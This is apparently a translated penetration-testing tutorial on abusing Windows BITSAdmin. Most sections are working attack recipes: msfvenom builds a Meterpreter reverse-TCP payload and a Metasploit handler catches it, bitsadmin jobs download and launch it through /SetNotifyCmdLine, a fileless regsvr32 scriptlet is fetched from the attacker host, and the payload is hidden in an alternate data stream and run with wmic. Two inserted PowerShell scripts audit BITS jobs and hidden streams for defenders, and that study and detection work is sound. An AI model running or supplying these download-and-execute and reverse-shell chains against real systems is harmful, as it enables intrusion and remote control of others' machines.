PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Created job {6143EB50-0335-46A2-AE74-FE12F01B9FCB}.
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab C:\Users\snowwolf\win7.txt C:\Users\snowwolf\Desktop\win7.txt
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Added C:\Users\snowwolf\win7.txt -> C:\Users\snowwolf\Desktop\win7.txt to job.
To start the transfer now, the following command must be run first:
PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Job resumed.
BITS writes the transfer to a temporary file; to obtain the complete file, the following command must also be run:
PS C:\Users\snowwolf\Desktop> bitsadmin /complete ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Job completed.
The transferred file can then be viewed with the type command.
The complete demonstration in screenshots is as follows:
PowerShell commands
With the release of Windows Server 2016, Microsoft updated the BITSAdmin commands for PowerShell.
┌──(root㉿kali)-[/var/www/html/test]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=5555 -f exe > bits.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Then enter the following commands in the Metasploit console to start the listener:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.8.145
lhost => 192.168.8.145
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.8.145:5555
Declare the job on the Windows host:
PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Created job {2FD005C1-B95A-4556-9875-14043605D20A}.
Add the payload to the job that was just created:
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab http://192.168.8.145/test/bits.exe C:\Users\snowwolf\Desktop\bits.exe
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Added http://192.168.8.145/test/bits.exe -> C:\Users\snowwolf\Desktop\bits.exe to job.
Then run the following command so that BITSAdmin downloads the file and executes it:
PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe"
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
notification command line set to 'cmd.exe' '/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe'.
Finally, run the following command to execute the downloaded payload file and obtain a session:
PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Job resumed.
Fileless hosting
Enter the following commands in the Metasploit console to generate the payload:
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 3
target => 3
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.8.145
lhost => 192.168.8.145
msf6 exploit(multi/script/web_delivery) > run
Next, we need to create a harmless job on the Windows host:
# Create the job
PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Created job {3B44478B-ABD3-4348-BB35-FC9FE37EDFCC}.
# Transfer a harmless text file
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab http://192.168.8.145/test/hello.txt C:\Users\snowwolf\Desktop\hello.txt
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Added http://192.168.8.145/test/hello.txt -> C:\Users\snowwolf\Desktop\hello.txt to job.
Next, change the command that is executed:
PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab regsvr32 "/s /n /u /i:http://192.168.8.145:8080/q7sk3UuHZOH.sct scrobj.dll"
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
notification command line set to 'regsvr32' '/s /n /u /i:http://192.168.8.145:8080/q7sk3UuHZOH.sct scrobj.dll'.
Finally, run the following command to obtain a session:
PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Job resumed.
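Every variant above (the local copy in the first section, the download-and-execute job, and the fileless regsvr32 job) leaves the same artefacts on the host: a BITS job, visible to the BITS cmdlets, whose file list and notification command line are set by /addfile and /SetNotifyCmdLine. The audit script below is an added example written for this page, not code from the original post. It relies on the NotifyCmdLine and FileList properties of the BitsJob objects returned by Get-BitsTransfer in the BitsTransfer module that ships with Windows, and on event ID 59 in the Microsoft-Windows-Bits-Client/Operational log, which records the remote URL when a transfer starts. The allow-listed hosts and the user-writable path pattern are constructed placeholders to be tuned per environment.

```powershell
# Added example (not from the original post): audit BITS jobs on a Windows host for
# the settings abused above, i.e. a notification command line (/SetNotifyCmdLine),
# a remote source outside an allow-list, or a destination in a user-writable folder.
# Run from an elevated session so that -AllUsers also returns other accounts' jobs.
Import-Module BitsTransfer

function Get-SuspiciousBitsJob {
    [CmdletBinding()]
    param(
        # Constructed placeholder allow-list; replace with the update/CDN hosts your
        # environment legitimately pulls from.
        [string[]]$AllowedHosts = @('download.windowsupdate.com', 'dl.delivery.mp.microsoft.com')
    )

    Get-BitsTransfer -AllUsers | ForEach-Object {
        $job = $_
        $reasons = New-Object System.Collections.Generic.List[string]

        # A notification command line makes BITS spawn a process when the job finishes
        # or errors. Legitimate enterprise jobs almost never set one.
        if (-not [string]::IsNullOrWhiteSpace($job.NotifyCmdLine)) {
            $reasons.Add("NotifyCmdLine set: $($job.NotifyCmdLine)")
        }

        foreach ($file in $job.FileList) {
            # Remote sources that are HTTP(S) but not on the allow-list. A purely local
            # copy (as in the first section) parses with the 'file' scheme and is skipped here.
            $uri = $null
            if ([System.Uri]::TryCreate($file.RemoteName, [System.UriKind]::Absolute, [ref]$uri) -and
                $uri.Scheme -in @('http', 'https') -and
                $AllowedHosts -notcontains $uri.Host) {
                $reasons.Add("remote source not on allow-list: $($file.RemoteName)")
            }
            # Destinations in user-writable locations (constructed pattern).
            if ($file.LocalName -match '\\(Desktop|Downloads|Temp|AppData|Public)\\') {
                $reasons.Add("destination in user-writable path: $($file.LocalName)")
            }
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                JobId       = $job.JobId
                DisplayName = $job.DisplayName
                Owner       = $job.OwnerAccount
                State       = $job.JobState
                Created     = $job.CreationTime
                Reasons     = ($reasons -join '; ')
            }
        }
    }
}

function Get-RecentBitsTransferEvent {
    param([int]$Hours = 24)
    # Event 59 is written when BITS starts transferring a file; its message carries the
    # job name and the remote URL, which survives even after the job is completed or cancelled.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Bits-Client/Operational'
        Id        = 59
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'Message'; e = { $_.Message -replace '\s+', ' ' } }
}

# Example run: staged and running jobs first, then the last day of transfer starts.
Get-SuspiciousBitsJob | Format-List
Get-RecentBitsTransferEvent -Hours 24 | Format-Table -AutoSize -Wrap
```

A job created with bitsadmin /create and not yet resumed sits in the Suspended state, so the first function also catches jobs that have been staged but not run; anything it flags can be inspected with Get-BitsTransfer -AllUsers and cancelled with Remove-BitsTransfer, which discards the temporary download rather than completing it.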
ADS (alternate data streams)
First, we reuse the payload created with Metasploit (bits.exe) and keep the listener waiting for the session.
Then run the following commands on the Windows host to create the job and add the file to transfer:
PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Created job {CB5F142D-C22D-487F-AC4D-1E158130927C}.
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab http://192.168.8.145/test/bits.exe C:\Users\snowwolf\Desktop\bits.exe
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Added http://192.168.8.145/test/bits.exe -> C:\Users\snowwolf\Desktop\bits.exe to job.
Then read the contents of the file and write them into an alternate data stream of bits.txt:
PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c type C:\Users\snowwolf\Desktop\bits.exe > C:\Users\snowwolf\Desktop\bits.txt:bits.exe"
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
notification command line set to 'cmd.exe' '/c type C:\Users\snowwolf\Desktop\bits.exe > C:\Users\snowwolf\Desktop\bits.txt:bits.exe'.
Next, download the file:
PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Job resumed.
Finally, execute it with wmic to obtain a session:
PS C:\Users\snowwolf\Desktop> wmic process call create .\bits.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 9;
};
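The stream written by the notification command above (bits.txt:bits.exe) is invisible to dir and to Explorer, but the FileSystem provider exposes it through the -Stream parameter. The script below is an added example written for this page, not code from the original post: it enumerates every file under a directory, lists streams other than the default :$DATA, and reads the first two bytes of each to see whether the content starts with the MZ header that every PE file carries. It assumes Windows PowerShell 3.0 or later (where -Stream exists) or PowerShell 7, and treats Zone.Identifier, the Mark-of-the-Web stream written by browsers and BITS, as benign noise by default.

```powershell
# Added example (not from the original post): locate alternate data streams that
# hide an executable, the pattern used above with "type bits.exe > bits.txt:bits.exe".

function Get-StreamHeaderBytes {
    param([string]$Path, [string]$Stream, [int]$Count = 2)
    # Windows PowerShell 3-5 reads raw bytes with -Encoding Byte; PowerShell 7 uses -AsByteStream.
    if ($PSVersionTable.PSVersion.Major -ge 6) {
        @(Get-Content -LiteralPath $Path -Stream $Stream -AsByteStream -TotalCount $Count)
    } else {
        @(Get-Content -LiteralPath $Path -Stream $Stream -Encoding Byte -TotalCount $Count)
    }
}

function Find-SuspiciousAds {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Root,
        # Zone.Identifier holds Mark-of-the-Web data and is common on downloaded files.
        [string[]]$IgnoreStreams = @('Zone.Identifier')
    )

    Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        # -Stream * returns one object per stream, including the default ':$DATA'.
        Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' -and $IgnoreStreams -notcontains $_.Stream } |
        ForEach-Object {
            $header = Get-StreamHeaderBytes -Path $file.FullName -Stream $_.Stream
            # 0x4D 0x5A is "MZ", the DOS header at the start of every PE (exe/dll).
            $isPe = ($header.Count -ge 2 -and $header[0] -eq 0x4D -and $header[1] -eq 0x5A)
            [pscustomobject]@{
                File        = $file.FullName
                Stream      = $_.Stream
                Length      = $_.Length
                LooksLikePE = $isPe
            }
        }
    }
}

# Example run: every non-default stream under the current user's Desktop, PE-looking first.
Find-SuspiciousAds -Root "$env:USERPROFILE\Desktop" |
    Sort-Object LooksLikePE -Descending |
    Format-Table -AutoSize
```

A stream flagged with LooksLikePE can be extracted for analysis with Get-Content -Stream, or removed without touching the carrier file with Remove-Item -Stream; copying the carrier to a non-NTFS volume also drops every alternate stream, which is why ADS-based staging rarely survives being moved off the host.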